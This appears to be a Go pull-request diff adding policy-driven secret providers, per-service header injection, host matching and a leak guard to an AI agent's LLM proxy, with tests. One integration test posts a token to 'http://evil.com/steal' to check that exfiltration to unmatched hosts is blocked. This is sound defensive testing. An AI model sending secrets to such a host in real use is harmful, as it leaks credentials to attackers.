+		{Name: "github", Hosts: []string{"api.github.com", "uploads.github.com"}},
+	})
+	for _, host := range []string{"api.github.com", "uploads.github.com"} {
+		name, ok := m.Match(host)
+		if !ok || name != "github" {
+			t.Errorf("Match(%q) = (%q, %v), want (github, true)", host, name, ok)
+		}
+	}
+}

--- a/internal/session/llmproxy.go
+++ b/internal/session/llmproxy.go
@@ -10,7 +10,10 @@ import (
 
 	"github.com/agentsh/agentsh/internal/config"
 	"github.com/agentsh/agentsh/internal/mcpregistry"
+	"github.com/agentsh/agentsh/internal/policy"
 	"github.com/agentsh/agentsh/internal/proxy"
+	"github.com/agentsh/agentsh/internal/proxy/services"
+	"gopkg.in/yaml.v3"
 )
 
 // StartLLMProxy creates and starts an embedded LLM proxy for the session.
@@ -27,8 +30,8 @@ func StartLLMProxy(
 	mcpCfg config.SandboxMCPConfig,
 	storagePath string,
 	logger *slog.Logger,
-	secretsFetcher SecretFetcher,
-	services []ServiceConfig,
+	providers map[string]yaml.Node,
+	policyServices []policy.ServiceYAML,
 ) (string, func() error, error) {
 	if sess == nil {
 		return "", nil, fmt.Errorf("session is nil")
@@ -99,21 +102,56 @@ func StartLLMProxy(
 
 	// Bootstrap credentials and register hooks if services are configured.
 	// Done BEFORE storing on session so a failure leaves no stale state.
-	if len(services) > 0 && secretsFetcher != nil {
-		table, secretsCleanup, err := BootstrapCredentials(ctx, secretsFetcher, services)
-		if err != nil {
+	if len(policyServices) > 0 {
+		resolved, resolveErr := ResolveServiceConfigs(policyServices)
+		if resolveErr != nil {
 			_ = p.Stop(ctx)
-			return "", nil, fmt.Errorf("bootstrap credentials: %w", err)
+			return "", nil, fmt.Errorf("resolve services: %w", resolveErr)
 		}
 
-		// Register hooks: leak guard first, then creds substitution.
+		providerConfigs, provErr := ResolveProviderConfigs(providers)
+		if provErr != nil {
+			_ = p.Stop(ctx)
+			return "", nil, fmt.Errorf("resolve providers: %w", provErr)
+		}
+
+		registry, regErr := BuildSecretsRegistry(ctx, providerConfigs)
+		if regErr != nil {
+			_ = p.Stop(ctx)
+			return "", nil, fmt.Errorf("build secrets registry: %w", regErr)
+		}
+
+		table, secretsCleanup, bsErr := BootstrapCredentials(ctx, registry, resolved.ServiceConfigs)
+		if bsErr != nil {
+			_ = registry.Close()
+			_ = p.Stop(ctx)
+			return "", nil, fmt.Errorf("bootstrap credentials: %w", bsErr)
+		}
+
+		// Register hooks: leak guard first, then creds substitution (both global).
 		leakGuard := proxy.NewLeakGuardHook(table, logger)
 		credsSub := proxy.NewCredsSubHook(table)
 		p.HookRegistry().Register("", leakGuard)
 		p.HookRegistry().Register("", credsSub)
 
-		sess.SetCredsTable(table, secretsCleanup)
-		LogSecretsInitialized(logger, sess.ID, len(services))
+		// Register per-service header injection hooks.
+		for _, ih := range resolved.InjectHeaders {
+			hook := proxy.NewHeaderInjectionHook(ih.ServiceName, ih.HeaderName, ih.Template, table)
+			p.HookRegistry().Register(ih.ServiceName, hook)
+		}
+
+		// Build and set matcher.
+		matcher := services.NewMatcher(resolved.Patterns)
+		p.SetMatcher(matcher)
+
+		// Wrap registry close into the secrets cleanup.
+		origCleanup := secretsCleanup
+		combinedCleanup := func() {
+			origCleanup()
+			_ = registry.Close()
+		}
+		sess.SetCredsTable(table, combinedCleanup)
+		LogSecretsInitialized(logger, sess.ID, len(resolved.ServiceConfigs))
 	}
 
 	// Store in session only after all setup (including bootstrap) succeeds.

--- a/internal/session/secrets_integration_test.go
+++ b/internal/session/secrets_integration_test.go
@@ -3,9 +3,16 @@ package session
 import (
 	"bytes"
 	"context"
+	"fmt"
+	"log/slog"
+	"net/http"
+	"net/http/httptest"
 	"testing"
 
+	"github.com/agentsh/agentsh/internal/policy"
+	"github.com/agentsh/agentsh/internal/proxy"
 	"github.com/agentsh/agentsh/internal/proxy/secrets"
+	"github.com/agentsh/agentsh/internal/proxy/services"
 )
 
 func TestCredentialPipeline_EndToEnd(t *testing.T) {
@@ -68,5 +75,105 @@ func TestCredentialPipeline_EndToEnd(t *testing.T) {
 	_, found = table.ContainsFake(cleanBody)
 	if found {
 		t.Error("ContainsFake should not flag clean body")
+	}
+}
+
+func TestIntegration_PolicyYAML_FullFlow(t *testing.T) {
+	// Setup: create a memory provider with a known secret.
+	memProvider := &memoryProvider{
+		secrets: map[string][]byte{
+			"agentsh/github_token": []byte("ghp_REAL1234567890abcdef12345678901234"),
+		},
+	}
+
+	// Exercise resolver path to verify YAML→config wiring.
+	yamlServices := []policy.ServiceYAML{
+		{
+			Name:   "github",
+			Match:  policy.ServiceMatchYAML{Hosts: []string{"api.github.com"}},
+			Secret: policy.ServiceSecretYAML{Ref: "keyring://agentsh/github_token"},
+			Fake:   policy.ServiceFakeYAML{Format: "ghp_{rand:34}"},
+			Inject: policy.ServiceInjectYAML{Header: &policy.ServiceInjectHeaderYAML{
+				Name: "Authorization", Template: "Bearer {{secret}}",
+			}},
+		},
+	}
+	resolved, err := ResolveServiceConfigs(yamlServices)
+	if err != nil {
+		t.Fatalf("ResolveServiceConfigs: %v", err)
+	}
+
+	// Bootstrap credentials.
+	table, cleanup, err := BootstrapCredentials(context.Background(), memProvider, resolved.ServiceConfigs)
+	if err != nil {
+		t.Fatalf("BootstrapCredentials: %v", err)
+	}
+	defer cleanup()
+
+	// Verify fake was generated and is in the table.
+	fake, ok := table.FakeForService("github")
+	if !ok {
+		t.Fatal("no fake for github")
+	}
+
+	// Build matcher from resolved patterns.
+	matcher := services.NewMatcher(resolved.Patterns)
+
+	// Verify host matching.
+	name, matched := matcher.Match("api.github.com")
+	if !matched || name != "github" {
+		t.Fatalf("Match(api.github.com) = (%q, %v)", name, matched)
+	}
+
+	// Verify fake→real substitution.
+	body := []byte(fmt.Sprintf(`{"token":"%s"}`, fake))
+	replaced := table.ReplaceFakeToReal(body)
+	if !bytes.Contains(replaced, []byte("ghp_REAL1234567890abcdef12345678901234")) {
+		t.Errorf("body not substituted: %s", replaced)
+	}
+	if bytes.Contains(replaced, fake) {
+		t.Errorf("fake still present after substitution: %s", replaced)
+	}
+
+	// Verify header injection using resolved InjectHeaders.
+	if len(resolved.InjectHeaders) == 0 {
+		t.Fatal("expected at least one InjectHeader from resolved config")
+	}
+	ih := resolved.InjectHeaders[0]
+	hook := proxy.NewHeaderInjectionHook(ih.ServiceName, ih.HeaderName, ih.Template, table)
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos", nil)
+	if err := hook.PreHook(req, &proxy.RequestContext{ServiceName: "github"}); err != nil {
+		t.Fatal(err)
+	}
+	authHeader := req.Header.Get("Authorization")
+	if authHeader != "Bearer ghp_REAL1234567890abcdef12345678901234" {
+		t.Errorf("Authorization = %q, want Bearer ghp_REAL...", authHeader)
+	}
+
+	// Verify real→fake scrubbing on response.
+	respBody := []byte(`{"echoed":"ghp_REAL1234567890abcdef12345678901234"}`)
+	scrubbed := table.ReplaceRealToFake(respBody)
+	if !bytes.Contains(scrubbed, fake) {
+		t.Errorf("response not scrubbed: %s", scrubbed)
+	}
+	if bytes.Contains(scrubbed, []byte("ghp_REAL1234567890abcdef12345678901234")) {
+		t.Errorf("real credential still present after scrubbing: %s", scrubbed)
+	}
+
+	// Verify leak guard allows matched service's own fake.
+	leakGuard := proxy.NewLeakGuardHook(table, slog.Default())
+	leakReq := httptest.NewRequest(http.MethodPost, "http://api.github.com/repos",
+		bytes.NewReader([]byte(fmt.Sprintf(`{"t":"%s"}`, fake))))
+	err = leakGuard.PreHook(leakReq, &proxy.RequestContext{ServiceName: "github"})
+	if err != nil {
+		t.Errorf("LeakGuard should allow matched service's own fake: %v", err)
+	}
+
+	// Verify leak guard blocks unmatched host.
+	leakReq2 := httptest.NewRequest(http.MethodPost, "http://evil.com/steal",
+		bytes.NewReader([]byte(fmt.Sprintf(`{"t":"%s"}`, fake))))
+	err = leakGuard.PreHook(leakReq2, &proxy.RequestContext{})
+	if err == nil {
+		t.Error("LeakGuard should block fakes to unmatched hosts")
 	}
 }

--- a/internal/session/secretsconfig.go
+++ b/internal/session/secretsconfig.go
@@ -1,0 +1,191 @@
+package session
+
+import (
+	"context"
+	"fmt"
+
+	"github.com/agentsh/agentsh/internal/policy"
+	"github.com/agentsh/agentsh/internal/proxy/secrets"
+	"github.com/agentsh/agentsh/internal/proxy/secrets/keyring"
+	"github.com/agentsh/agentsh/internal/proxy/secrets/vault"
+	"github.com/agentsh/agentsh/internal/proxy/services"
+	"gopkg.in/yaml.v3"
+)
+
+// InjectHeaderConfig holds header injection config for one service.
+type InjectHeaderConfig struct {
+	ServiceName string
+	HeaderName  string
+	Template    string
+}
+
+// ResolvedServices holds the parsed outputs needed by the bootstrap flow.
+type ResolvedServices struct {
+	ServiceConfigs []ServiceConfig
+	Patterns       []services.ServicePattern
+	InjectHeaders  []InjectHeaderConfig
+}
+
+// ResolveProviderConfigs decodes policy YAML provider nodes into
+// typed ProviderConfig values suitable for secrets.NewRegistry.
+func ResolveProviderConfigs(providers map[string]yaml.Node) (map[string]secrets.ProviderConfig, error) {
+	if len(providers) == 0 {
+		return nil, nil
+	}
+	configs := make(map[string]secrets.ProviderConfig, len(providers))
+	for name, node := range providers {
+		cfg, err := decodeProviderConfig(name, node)
+		if err != nil {
+			return nil, fmt.Errorf("provider %q: %w", name, err)
+		}
+		configs[name] = cfg
+	}
+	return configs, nil
+}
+
+// ResolveServiceConfigs converts policy YAML service declarations into
+// ServiceConfigs for BootstrapCredentials plus ServicePatterns for the
+// matcher and InjectHeaderConfigs for hook registration.
+func ResolveServiceConfigs(svcs []policy.ServiceYAML) (*ResolvedServices, error) {
+	if len(svcs) == 0 {
+		return nil, nil
+	}
+	result := &ResolvedServices{
+		ServiceConfigs: make([]ServiceConfig, 0, len(svcs)),
+		Patterns:       make([]services.ServicePattern, 0, len(svcs)),
+	}
+	for _, svc := range svcs {
+		ref, err := secrets.ParseRef(svc.Secret.Ref)
+		if err != nil {
+			return nil, fmt.Errorf("service %q: %w", svc.Name, err)
+		}
+		result.ServiceConfigs = append(result.ServiceConfigs, ServiceConfig{
+			Name:       svc.Name,
+			SecretRef:  ref,
+			FakeFormat: svc.Fake.Format,
+		})
+		result.Patterns = append(result.Patterns, services.ServicePattern{
+			Name:  svc.Name,
+			Hosts: svc.Match.Hosts,
+		})
+		if svc.Inject.Header != nil {
+			result.InjectHeaders = append(result.InjectHeaders, InjectHeaderConfig{
+				ServiceName: svc.Name,
+				HeaderName:  svc.Inject.Header.Name,
+				Template:    svc.Inject.Header.Template,
+			})
+		}
+	}
+	return result, nil
+}
+
+// DefaultConstructors returns the constructor map for all known
+// provider types. Used by secrets.NewRegistry.
+func DefaultConstructors() map[string]secrets.ConstructorFunc {
+	return map[string]secrets.ConstructorFunc{
+		"keyring": func(_ context.Context, cfg secrets.ProviderConfig, _ secrets.RefResolver) (secrets.SecretProvider, error) {
+			kc, ok := cfg.(keyring.Config)
+			if !ok {
+				return nil, fmt.Errorf("expected keyring.Config, got %T", cfg)
+			}
+			return keyring.New(kc)
+		},
+		"vault": func(ctx context.Context, cfg secrets.ProviderConfig, resolver secrets.RefResolver) (secrets.SecretProvider, error) {
+			vc, ok := cfg.(vault.Config)
+			if !ok {
+				return nil, fmt.Errorf("expected vault.Config, got %T", cfg)
+			}
+			return vault.New(ctx, vc, resolver)
+		},
+	}
+}
+
+// decodeProviderConfig decodes a yaml.Node into the appropriate
+// typed ProviderConfig based on the "type" field.
+func decodeProviderConfig(_ string, node yaml.Node) (secrets.ProviderConfig, error) {
+	var base struct {
+		Type string `yaml:"type"`
+	}
+	if err := node.Decode(&base); err != nil {
+		return nil, fmt.Errorf("decode type: %w", err)
+	}
+	switch base.Type {
+	case "keyring":
+		return keyring.Config{}, nil
+	case "vault":
+		return decodeVaultConfig(node)
+	default:
+		return nil, fmt.Errorf("unknown provider type %q", base.Type)
+	}
+}
+
+// vaultYAML is the YAML representation of a vault provider config.
+type vaultYAML struct {
+	Type      string        `yaml:"type"`
+	Address   string        `yaml:"address"`
+	Namespace string        `yaml:"namespace,omitempty"`
+	Auth      vaultAuthYAML `yaml:"auth"`
+}
+
+type vaultAuthYAML struct {
+	Method        string `yaml:"method"`
+	Token         string `yaml:"token,omitempty"`
+	TokenRef      string `yaml:"token_ref,omitempty"`
+	RoleID        string `yaml:"role_id,omitempty"`
+	RoleIDRef     string `yaml:"role_id_ref,omitempty"`
+	SecretID      string `yaml:"secret_id,omitempty"`
+	SecretIDRef   string `yaml:"secret_id_ref,omitempty"`
+	KubeRole      string `yaml:"kube_role,omitempty"`
+	KubeMountPath string `yaml:"kube_mount_path,omitempty"`
+	KubeTokenPath string `yaml:"kube_token_path,omitempty"`
+}
+
+func decodeVaultConfig(node yaml.Node) (secrets.ProviderConfig, error) {
+	var raw vaultYAML
+	if err := node.Decode(&raw); err != nil {
+		return nil, fmt.Errorf("decode vault config: %w", err)
+	}
+	cfg := vault.Config{
+		Address:   raw.Address,
+		Namespace: raw.Namespace,
+		Auth: vault.AuthConfig{
+			Method:        raw.Auth.Method,
+			Token:         raw.Auth.Token,
+			RoleID:        raw.Auth.RoleID,
+			SecretID:      raw.Auth.SecretID,
+			KubeRole:      raw.Auth.KubeRole,
+			KubeMountPath: raw.Auth.KubeMountPath,
+			KubeTokenPath: raw.Auth.KubeTokenPath,
+		},
+	}
+	// Parse chained refs.
+	if raw.Auth.TokenRef != "" {
+		ref, err := secrets.ParseRef(raw.Auth.TokenRef)
+		if err != nil {
+			return nil, fmt.Errorf("auth.token_ref: %w", err)
+		}
+		cfg.Auth.TokenRef = &ref
+	}
+	if raw.Auth.RoleIDRef != "" {
+		ref, err := secrets.ParseRef(raw.Auth.RoleIDRef)
+		if err != nil {
+			return nil, fmt.Errorf("auth.role_id_ref: %w", err)
+		}
+		cfg.Auth.RoleIDRef = &ref
+	}
+	if raw.Auth.SecretIDRef != "" {
+		ref, err := secrets.ParseRef(raw.Auth.SecretIDRef)
+		if err != nil {
+			return nil, fmt.Errorf("auth.secret_id_ref: %w", err)
+		}
+		cfg.Auth.SecretIDRef = &ref
+	}
+	return cfg, nil
+}
+
+// BuildSecretsRegistry creates a provider registry from the resolved
+// config and returns a SecretFetcher. Convenience wrapper around
+// secrets.NewRegistry.
+func BuildSecretsRegistry(ctx context.Context, configs map[string]secrets.ProviderConfig) (*secrets.Registry, error) {
+	return secrets.NewRegistry(ctx, configs, DefaultConstructors())
+}

--- a/internal/session/secretsconfig_test.go
+++ b/internal/session/secretsconfig_test.go
@@ -1,0 +1,110 @@
+package session
+
+import (
+	"testing"
+
+	"github.com/agentsh/agentsh/internal/policy"
+	"github.com/agentsh/agentsh/internal/proxy/secrets/vault"
+	"gopkg.in/yaml.v3"
+)
+
+func mustYAMLNode(t *testing.T, s string) yaml.Node {
+	t.Helper()
+	var node yaml.Node
+	if err := yaml.Unmarshal([]byte(s), &node); err != nil {
+		t.Fatal(err)
+	}
+	if node.Kind == yaml.DocumentNode && len(node.Content) > 0 {
+		return *node.Content[0]
+	}
+	return node
+}
+
+func TestResolveProviderConfigs_Keyring(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"kr": mustYAMLNode(t, "type: keyring"),
+	}
+	configs, err := ResolveProviderConfigs(providers)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(configs) != 1 {
+		t.Fatalf("expected 1 config, got %d", len(configs))
+	}
+	if configs["kr"].TypeName() != "keyring" {
+		t.Errorf("TypeName = %q, want keyring", configs["kr"].TypeName())
+	}
+}
+
+func TestResolveProviderConfigs_Vault(t *testing.T) {
+	providers := map[string]yaml.Node{
+		"v": mustYAMLNode(t, "type: vault\naddress: https://vault.example.com\nauth:\n  method: token\n  token_ref: keyring://agentsh/vt"),
+	}
+	configs, err := ResolveProviderConfigs(providers)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	vc, ok := configs["v"].(vault.Config)
+	if !ok {
+		t.Fatalf("expected vault.Config, got %T", configs["v"])
+	}
+	if vc.Address != "https://vault.example.com" {
+		t.Errorf("Address = %q", vc.Address)
+	}
+	if vc.Auth.TokenRef == nil {
+		t.Fatal("TokenRef should be set")
+	}
+	if vc.Auth.TokenRef.Scheme != "keyring" {
+		t.Errorf("TokenRef.Scheme = %q, want keyring", vc.Auth.TokenRef.Scheme)
+	}
+}
+
+func TestResolveProviderConfigs_Empty(t *testing.T) {
+	configs, err := ResolveProviderConfigs(nil)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if configs != nil {
+		t.Errorf("expected nil, got %v", configs)
+	}
+}
+
+func TestResolveServiceConfigs(t *testing.T) {
+	svcs := []policy.ServiceYAML{
+		{
+			Name:   "github",
+			Match:  policy.ServiceMatchYAML{Hosts: []string{"api.github.com"}},
+			Secret: policy.ServiceSecretYAML{Ref: "keyring://agentsh/gh"},
+			Fake:   policy.ServiceFakeYAML{Format: "ghp_{rand:36}"},
+			Inject: policy.ServiceInjectYAML{Header: &policy.ServiceInjectHeaderYAML{
+				Name: "Authorization", Template: "Bearer {{secret}}",
+			}},
+		},
+	}
+	result, err := ResolveServiceConfigs(svcs)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if len(result.ServiceConfigs) != 1 {
+		t.Fatalf("expected 1 config, got %d", len(result.ServiceConfigs))
+	}
+	if result.ServiceConfigs[0].Name != "github" {
+		t.Errorf("Name = %q", result.ServiceConfigs[0].Name)
+	}
+	if len(result.Patterns) != 1 || result.Patterns[0].Name != "github" {
+		t.Error("patterns not populated")
+	}
+	if len(result.InjectHeaders) != 1 || result.InjectHeaders[0].HeaderName != "Authorization" {
+		t.Error("inject headers not populated")
+	}
+}
+
+func TestResolveServiceConfigs_Empty(t *testing.T) {
+	result, err := ResolveServiceConfigs(nil)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if result != nil {
+		t.Error("expected nil")
+	}
+}


### PR DESCRIPTION
## Summary
- Parse `providers:` and `services:` from policy YAML with structural validation
- `ServiceMatcher` resolves HTTP Host headers to service names (literal + `*.suffix` wildcards)
- `HeaderInjectionHook` injects real credentials into outbound request headers per service
- Extended `CredsSubHook` to substitute fakes in headers, URL query, and URL path (not just body)
- `LeakGuardHook` now service-aware: allows matched service's own fakes, blocks cross-service leaks and unmatched hosts
- Proxy `ServeHTTP` wires matcher into hook dispatch for per-service hook execution
- Resolver bridges policy YAML types to existing secrets infrastructure (provider Registry, BootstrapCredentials)
- End-to-end integration test covering full credential flow

## Test Plan
- [ ] `go test ./...` passes (87 packages, 0 failures)
- [ ] `GOOS=windows go build ./...` cross-compiles clean
- [ ] Backward compatible — `nil, nil` policy args preserve existing behavior
- [ ] Integration test validates: bootstrap → matcher → substitution → header injection → scrubbing → leak guard

🤖 Generated with [Claude Code](https://claude.com/claude-code)